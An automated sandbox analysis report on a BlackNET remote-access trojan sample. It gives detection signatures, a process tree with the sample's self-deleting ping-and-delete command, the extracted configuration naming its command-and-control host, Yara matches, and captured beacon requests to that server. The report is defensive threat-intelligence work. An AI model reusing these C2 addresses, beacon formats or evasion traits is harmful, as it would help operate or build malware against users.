Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe

Overview

General Information

Sample Name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Analysis ID:471063
MD5:bc15770f9c1c0735cb5cc9d800476ab0
SHA1:7700f53b4de7abcd0aa28a1989f73aad394b49bb
SHA256:4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
Tags:BlackNETexe
Infos:

Most interesting Screenshot:

Detection

BlackNET
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BlackNET
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Uses ping.exe to sleep
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 4804 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 5936 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 7100 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 7060 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 3028 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6036 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6752 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 5580 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6492 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • winhost.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6984 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5668 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: BlackNET

{"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
  • 0x110c6:$s1: svchosts.exe
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeJoeSecurity_BlackNETYara detected BlackNETJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    dropped/winhost.exeSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
    • 0x110c6:$s1: svchosts.exe
    dropped/winhost.exeMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
    • 0xe740:$s1: wireshark
    • 0xe6f6:$s2: procexp
    dropped/winhost.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
    • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
    • 0xffc0:$s7: shutdown -r -t 00
    dropped/winhost.exeHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
    • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
    dropped/winhost.exeJoeSecurity_BlackNETYara detected BlackNETJoe Security
      Click to see the 5 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
        00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
          0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
            00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
              00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                19.2.winhost.exe.160000.0.unpackSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
                • 0x110c6:$s1: svchosts.exe
                19.2.winhost.exe.160000.0.unpackMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
                • 0xe740:$s1: wireshark
                • 0xe6f6:$s2: procexp
                19.2.winhost.exe.160000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
                • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
                • 0xffc0:$s7: shutdown -r -t 00
                19.2.winhost.exe.160000.0.unpackHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
                • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
                19.2.winhost.exe.160000.0.unpackJoeSecurity_BlackNETYara detected BlackNETJoe Security
                  Click to see the 45 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpackMalware Configuration Extractor: BlackNET {"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeVirustotal: Detection: 68%Perma Link
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMetadefender: Detection: 52%Perma Link
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeReversingLabs: Detection: 85%
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeAvira: detected
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: gpay-safe.ruVirustotal: Detection: 6%Perma Link
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeMetadefender: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeReversingLabs: Detection: 85%
                  Machine Learning detection for sampleShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeJoe Sandbox ML: detected
                  Source: 19.0.winhost.exe.160000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 16.0.winhost.exe.ae0000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 8.0.winhost.exe.720000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.IdentifierJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\Jump to behavior

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49724 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49725 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49726 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49727 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49730 -> 91.206.93.216:80
                  Uses ping.exe to check the status of other devices and networksShow sources
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://gpay-safe.ru/x/
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Aug 2021 22:49:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru
                  Source: winhost.exe, winhost.exe, 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeString found in binary or memory: http://gpay-safe.ru/x/
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.o
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlx
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
